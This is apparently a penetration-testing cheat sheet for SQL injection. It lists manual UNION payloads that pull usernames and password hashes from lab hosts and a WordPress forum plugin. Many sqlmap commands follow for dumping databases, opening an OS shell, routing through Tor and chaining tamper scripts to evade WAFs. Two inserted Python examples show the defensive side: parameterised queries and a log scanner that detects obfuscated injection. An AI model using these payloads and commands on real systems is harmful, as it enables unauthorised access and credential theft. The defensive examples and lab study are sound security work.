SQL Injection
http://10.11.15.137/comment.php?id=756'
http://10.11.15.137/comment.php?id=756 order by 7
http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,6,7
http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,table_name,7 from information_schema.tables
http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,column_name,7 from information_schema.columns where table_name='users'
http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,concat(name,0x3a,password),7 FROM users
http://10.11.1.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381 union all select 1
http://10.11.1.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group_concat(user_login,0x3a,user_pass)+from+wp_users
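As an added illustration (not part of the original cheat sheet), this Python script models the comment.php lookup above against a constructed SQLite database: it shows why the `union all select` payload returns extra rows when the id is concatenated into the query text, and nothing when the id is validated and bound as a parameter. The table and column names are assumptions, not the lab's schema.

```python
import sqlite3

# Constructed in-memory stand-in for the comment.php backend probed above;
# the comments/users tables and their columns are assumptions, not the lab's schema.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE comments(id INTEGER, author TEXT, body TEXT);
        CREATE TABLE users(name TEXT, password TEXT);
        INSERT INTO comments VALUES (756, 'alice', 'first post');
        INSERT INTO users VALUES ('admin', 'constructed-hash-value');
    """)
    return db

def fetch_comment_vulnerable(db, comment_id):
    # The id parameter is pasted into the SQL text, so a UNION in the input
    # becomes a second SELECT that the database runs as part of the query.
    sql = "SELECT id, author, body FROM comments WHERE id = " + comment_id
    return db.execute(sql).fetchall()

def fetch_comment_safe(db, comment_id):
    # Defence in depth: validate the type first, then bind the value as a
    # parameter so the driver never parses it as SQL.
    try:
        cid = int(comment_id)
    except ValueError:
        return []
    sql = "SELECT id, author, body FROM comments WHERE id = ?"
    return db.execute(sql, (cid,)).fetchall()

# SQLite spelling of the cheat sheet's concat(name,0x3a,password) payload:
# three columns to match the original SELECT, '||' instead of concat().
PAYLOAD = "756 union all select 1, name || ':' || password, 3 from users"

if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", fetch_comment_vulnerable(db, PAYLOAD))
    print("safe:      ", fetch_comment_safe(db, PAYLOAD))
```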
If you don't know anything about the target site, run the basic command first and check whether sqlmap finds anything interesting.
sqlmap -u "https://target_site.com/page/"
sqlmap -u "https://target_site.com/page?p1=value1&p2=value2"
You can choose which parameter to test or exploit for SQL injection with the "-p" flag.
sqlmap -u "https://target_site.com/page?p1=value1&p2=value2" -p p1
sqlmap -u "https://target_site.com/page/" --data="p1=value1&p2=value2"
You can also give sqlmap a file containing the raw HTTP request; this is easy to export from Burp Suite.
sqlmap -r request.txt
Here you can still specify the target parameter; otherwise sqlmap will detect and test all the parameters it finds in the request.
Specify Custom Position in HTTP request file
You can use an asterisk (*) to mark which parameter, or which position in the request, should be tested. Any part of the request can be marked this way.
sqlmap -u "https://target_site.com/page/" --data="p1=value1&p2=value2" --cookie="Session_Cookie_Value"
sqlmap -u "https://target_site.com/page/" --data="p1=value1&p2=value2" --headers="Authorization: Basic YWxhZGRpbjpvcGVuc2VzYW1l"
sqlmap -u "https://target_site.com/page/" --data="p1=value1&p2=value2" --auth-type=basic --auth-cred=username:password
Once sqlmap confirms an injection point, it automatically creates a session file (.sqlite) for later use. If you want to run other commands later, you can point sqlmap at that session file directly; this saves the time of re-trying all the payloads and re-identifying the vulnerability.
sqlmap -u "https://target_site.com/page?p1=value1" -s SESSION-FILE.sqlite --dbs
You can find this file in sqlmap's output directory under your home path.
Once the SQL injection has been confirmed, you can use the following commands to exploit it.
sqlmap -u "https://target_site.com/page?p1=value1" --dbs
sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB --tables
sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB -T TARGET_TABLE --columns
sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB -T TARGET_TABLE -C "Col1,Col2" --dump
sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB -T TARGET_TABLE --dump
sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB --dump
sqlmap -u "https://target_site.com/page?p1=value1" --sql-query "SELECT * FROM TARGET_DB;"
sqlmap -u "https://target_site.com/page?p1=value1" --os-shell
sqlmap -u "https://target_site.com/page?p1=value1" --sqlmap-shell
sqlmap -u "https://target_site.com/page?p1=value1" --proxy="http://127.0.0.1:8080/"
sqlmap -u "https://target_site.com/page?p1=value1" --tor --tor-type=SOCKS5 --check-tor --dbs
sqlmap -u "https://target_site.com/page?p1=value1" --dbms=mysql
You can use other DBMS types like MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, Percona, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB, FrontBase, etc.
--technique: specify one or more letters from BEUSTQ to control which injection techniques are attempted:
- B: Boolean-based blind
- E: Error-based
- U: Union query-based
- S: Stacked queries
- T: Time-based blind
- Q: Inline queries
sqlmap -u "https://target_site.com/page?p1=value1" --technique=BEUSTQ
You can control how thorough the tests are using two flags:
- --level=LEVEL: level of tests to perform (1-5, default 1)
- --risk=RISK: risk of tests to perform (0-3, default 1)
sqlmap -u "https://target_site.com/page?p1=value1" --risk=3 --level=5
Option: --risk
This option requires an argument that specifies the risk of tests to perform. There are three risk values.
--risk=1: the default value, used for the majority of SQL injection points.
--risk=2: adds the heavy-query time-based SQL injection tests to the default level.
--risk=3: also adds the OR-based SQL injection tests.
Option: --level
When the value of --level is >= 2 it also tests HTTP Cookie header values. When the value is >= 3 it also tests the HTTP User-Agent and HTTP Referer header values for SQL injection.
Use the --batch flag to accept all the default options, for example in non-interactive sessions. (With --batch, sqlmap will not prompt you for (Y/N) choices but will pick the answer itself.)
sqlmap -u "https://target_site.com/page?p1=value1" --batch
Force sqlmap to use SSL or TLS for its requests.
Error: Can't establish SSL connection
If you get the error above during testing, use the --force-ssl flag to force sqlmap to use SSL/TLS.
You can use tamper scripts to modify the payload, for example to get past a WAF. Multiple tamper scripts can be chained at once with the --tamper flag.
sqlmap -u "https://target_site.com/page?p1=value1" --tamper=charencode
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dsash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
Alternatively, you can write your own custom tamper script to handle cases such as payloads that must be encrypted or hashed (AES, DES, hashing, etc.) before they are sent.
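To show the defender's side of the tamper scripts above, here is an added Python example (not from the page) that normalises the query string of constructed web-server access-log lines, reversing the charencode, randomcase, space2comment and space2plus transformations before matching union-based injection signatures; the log format, client addresses and signature list are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines, not from the page: one clean request, one plain UNION
# payload, and three obfuscated as the tamper scripts would (space2comment+randomcase, charencode, space2plus).
LOG_LINES = [
    '10.0.0.5 - - [12/May/2024:10:01:02] "GET /comment.php?id=756 HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/May/2024:10:01:07] "GET /comment.php?id=756%20union%20all%20select%201,2,3 HTTP/1.1" 200 800',
    '10.0.0.9 - - [12/May/2024:10:01:09] "GET /comment.php?id=756/**/UnIoN/**/aLl/**/SeLeCt/**/1,2,table_name/**/FrOm/**/information_schema.tables HTTP/1.1" 200 800',
    '10.0.0.9 - - [12/May/2024:10:01:12] "GET /comment.php?id=756%20%75%6e%69%6f%6e%20%61%6c%6c%20%73%65%6c%65%63%74%201,2,3 HTTP/1.1" 200 800',
    '10.0.0.9 - - [12/May/2024:10:01:15] "GET /feed.php?topic=-4381+union+select+group_concat(user_login,0x3a,user_pass)+from+wp_users HTTP/1.1" 200 2048',
]

REQUEST = re.compile(r'"(?:GET|POST) (\S+)')
# Patterns checked against the normalised query string.
SIGNATURES = [
    r"\bunion\b.*\bselect\b",      # union-based injection
    r"\binformation_schema\b",     # schema enumeration
    r"\bgroup_concat\s*\(",        # row aggregation used for dumps
    r"\border\s+by\s+\d+",         # column-count probing
]

def normalize(query):
    # Undo the tamper transformations before matching: repeated percent-decoding
    # (charencode, chardoubleencode), '+' to space (space2plus), inline comments to a
    # space (space2comment), whitespace collapse (multiplespaces), case folding (randomcase).
    prev = None
    while prev != query:
        prev, query = query, unquote_plus(query)
    query = re.sub(r"/\*.*?\*/", " ", query)
    return re.sub(r"\s+", " ", query).strip().lower()

def scan(lines):
    # Returns (client_ip, normalised query, matched signatures) for each suspicious line.
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        query = normalize(m.group(1).partition("?")[2])
        matched = [s for s in SIGNATURES if re.search(s, query)]
        if matched:
            hits.append((line.split()[0], query, matched))
    return hits

if __name__ == "__main__":
    for ip, query, matched in scan(LOG_LINES):
        print(ip, "->", query, matched)
```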